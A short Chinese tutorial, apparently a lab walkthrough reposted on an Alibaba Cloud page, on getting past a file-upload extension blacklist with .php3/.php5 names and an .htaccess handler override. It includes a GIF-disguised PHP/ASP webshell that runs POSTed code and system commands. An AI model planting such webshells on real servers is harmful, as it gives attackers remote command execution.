檔案上傳繞過黑名單的方法

來源:互聯網
上載者:User
這篇文章主要介紹了關於檔案上傳繞過黑名單的方法,有著一定的參考價值,現在分享給大家,有需要的朋友可以參考一下

 本關主要通過設定上傳尾碼,限制asp,php,jsp 等尾碼,不允許上傳。

 姿勢一:本次繞過方式為修改尾碼為.php3,php5等,這裡是黑名單驗證('.asp','.aspx','.php','.jsp'),我們可上傳php3,php5...等這樣可以被伺服器解析的尾碼名

姿勢二:重寫檔案解析規則繞過

1、先上傳先上傳一個名為.htaccess檔案,內容如下:

<FilesMatch "1.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

2、上傳1.jpg指令碼

內容:

GIF89a<?php eval($_POST['joker']);?><%eval request("joker")%><?php system($_POST['cmd']);?>


最後查看結果如下:

以上就是本文的全部內容,希望對大家的學習有所協助,更多相關內容請關注topic.alibabacloud.com!

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.